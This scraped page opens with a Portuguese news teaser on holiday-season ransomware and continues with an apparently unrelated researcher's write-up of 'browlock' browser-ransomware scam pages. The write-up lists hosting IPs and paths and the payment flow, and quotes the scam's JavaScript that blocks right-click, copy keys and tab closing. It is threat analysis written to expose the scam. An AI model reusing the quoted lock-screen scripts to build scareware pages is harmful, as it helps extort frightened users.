Ataques Ramsomware vão crescer mais de 300% a partir da Black Friday
Ataques Ramsomware vão crescer mais de 300% a partir da Black Friday
A temporada de compras de fim de ano está prestes a começar, e a expectativa do mercado é de que as compras online continuarão a desempenhar um papel importante nas vendas. Mas, embora a Black Friday e a Cyber Monday sejam, geralmente, vistas como o início da temporada de compras de fim de ano, os especialistas em segurança da F-Secure alertam que os criminosos podem executar campanhas de…
About 3 months ago I published an article regarding the 'browlock' browser ransomware here. Recently I discovered a new variant of this browser ransomware. This time in stead of a generic allegation from the local police department users are now warned because of piracy.
The first time this one popped up was around the end of September, at the time it was hosted on 213.133.111.10 (malwr.com). Currently it is hosted on 178.254.44.45 (malwr.com).
After this the user is redirected to the gate of the browserlocker:
/panel/landing/gate.php?hwid=%
The % is filled with some ID generated from system metadata. This page then redirects the user to the correct country based template for the locker. These are titled, DE.php, NL.php, CH.php, etc. For this they use the Skypex Geo library.
This browserlocker variant should not even be called a browser locker as it doesn't lock the browser at all. There is only some JavaScript to disable the right click option on the webpage. From the landing page:
<!--
//Disable right click script
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
In no way does the landing page block the user from leaving and/or just closing the browser/tab like the first browlock did. The landing page itself looks ripped from other templates and the payment buttons sometimes intersects with the rest of the info.
The payment method is always Paysafecard, no other payment methods have been implemented by the actors at this time. There are however hints that they had implemented / are going to implement Ukash at some point, a snippet of JavaScript code in one of the landing page files:
The panel from which they operate this scam also has partial broken scripts, references to scripts and stylesheets and more. For those wanting to poke around, the panel logins are located here:
The actors behind this setup seem to originate from a German speaking country. This because the base template for their locker is German and their management panel as well. This can also be seen in their logout message:
178.254.44.45/loader/logout
This says "Logout erfolgreich!" which means logout was successful.
They currently target the following countries with their browser 'locker':
Austria
Belgium
Switzerland
Germany
Spain
Great Britain
Greece
Italy
Netherlands
Portugal
Sweden
United States
And the designs for each country, Belgium has two designs as there is a Flemish and French speaking part of the country.
It seems our ransomware friends have decided to go on an easier path. Instead of having to infect machines they now just hijack the browser. This is done via advertisements. Where you would normally get an exploit kit to drop the ransomware on the machine it is now just a website. It does not load an exploit kit, no malware just a webpage.
Edit: It was pointed out to me that this is 'Browlock' as described here by F-Secure: http://www.f-secure.com/weblog/archives/00002590.html
They do some tricks to fool the average home user into thinking their PC might be locked. It doesn't allow the tab / browser to just be closed, it shows some nag messages as well disable any clicking or context menu interaction. But just killing the process or holding the enter key when the nag messages start will solve the problem of the 'locking'. There is no locking of files or locking the actual browser, just javascript snippets to convince the user.
The page itself it far from interesting, it is the usual "You have committed a crime! You must pay X amount of currency to unlock all your PC". The only nagging part about these browser ransomware pages are the little snippets to disallow you from leaving the page. It has some javascript to disable copy pasting and the right mouse button context menu:
document.ondragstart = test;
document.onselectstart = test;
document.oncontextmenu = test;
function test() {
return false;
}
document.oncontextmenu;
function catchControlKeys(event){
var code=event.keyCode ? event.keyCode : event.which ? event.which : null;
if (event.ctrlKey){
// Ctrl+U
if (code == 117) return false;
if (code == 85) return false;
// Ctrl+C
if (code == 99) return false;
if (code == 67) return false;
// Ctrl+A
if (code == 97) return false;
if (code == 65) return false;
}
}
The snippet below is inserted a couple hundred times to nag users when they try to close the browser or tab:
<iframe srcdoc="<script>window.onbeforeunload = function(env){return '< Automated translated setence saying your browser is locked and you should pay to unlock it >';}</script>" src="about:srcdoc"></iframe>
All the payment processing is done by posting the entered payment numbers to:
hxxp://r0849(dot)com/checkout.php
Manually visiting this page redirects you to another ransomeware page.
Everything runs on the same machine with IP: 91.220.131.108
This IP currently has the following domains pointing to it:
Appending '/?result=success' to these URLs will show you the screen of when a payment is successful, appending '/?result=fail' will show you the screen when a wrong code is used. When a user 'successfully' unlocks the 'ransomware' by paying he/she will get a message saying their browser will be unlocked in 12 hours.
And here is a list of all the templates used for all the different countries they target:
Edit: Added Mexican and Irish template design thanks to Kafeine!
Edit 2: Added Portuguese, Finish and Australian design thanks to Kira 2.0!
